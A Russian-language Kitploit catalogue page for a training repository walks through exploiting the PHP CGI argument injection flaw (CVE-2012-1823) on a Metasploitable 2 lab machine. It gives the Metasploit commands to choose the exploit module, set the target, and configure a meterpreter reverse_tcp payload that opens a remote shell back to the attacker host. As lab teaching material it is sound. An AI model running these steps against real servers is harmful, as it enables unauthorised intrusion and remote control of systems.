Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PHP-CGI-Argument-Injection-Exploit — В этом видео демонстрируется эксплуатация уязвимости PHP CGI Argument Injection (CVE-2012-1823) на сервере Metasploitable 2 с помощью Kali Linux и Metasploit. | Kitploit
Инструменты/GitHubGitHub/nulltrace1336/php-cgi-argument-injection-exploit
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubnulltrace1336/php-cgi-argument-injection-exploit

PHP-CGI-Argument-Injection-Exploit

В этом видео демонстрируется эксплуатация уязвимости PHP CGI Argument Injection (CVE-2012-1823) на сервере Metasploitable 2 с помощью Kali Linux и Metasploit.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
7 месяцев назадЕщё не проверено

🎬 Этот видеоролик YouTube

YouTube Video

1️⃣ Проверка цели

Определите IP Metasploitable с Kali:

root@kitploit:~
ip a

Например:

Kali: 192.168.56.101

Metasploitable2: 192.168.56.102

Проверяем порт и сервис:

root@kitploit:~
nmap -p 80 192.168.56.102

Также можно проверить в браузере:

http://192.168.56.102/

2️⃣ Запуск Metasploit

root@kitploit:~
msfconsole

3️⃣ Выбор модуля эксплойта PHP CGI

root@kitploit:~
search php cgi

Правильный модуль:

root@kitploit:~
use exploit/multi/http/php_cgi_arg_injection

4️⃣ Настройка эксплойта

root@kitploit:~
set RHOSTS 192.168.56.102
set RPORT 80
set TARGETURI /

Выбираем полезную нагрузку (payload):

root@kitploit:~
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444

Проверяем:

root@kitploit:~
show options

5️⃣ Запуск эксплойта

root@kitploit:~
run

или

root@kitploit:~
exploit

Если всё прошло успешно:

Meterpreter session 1 opened

6️⃣ Проверка доступа

root@kitploit:~
sysinfo
whoami
Скачать инструмент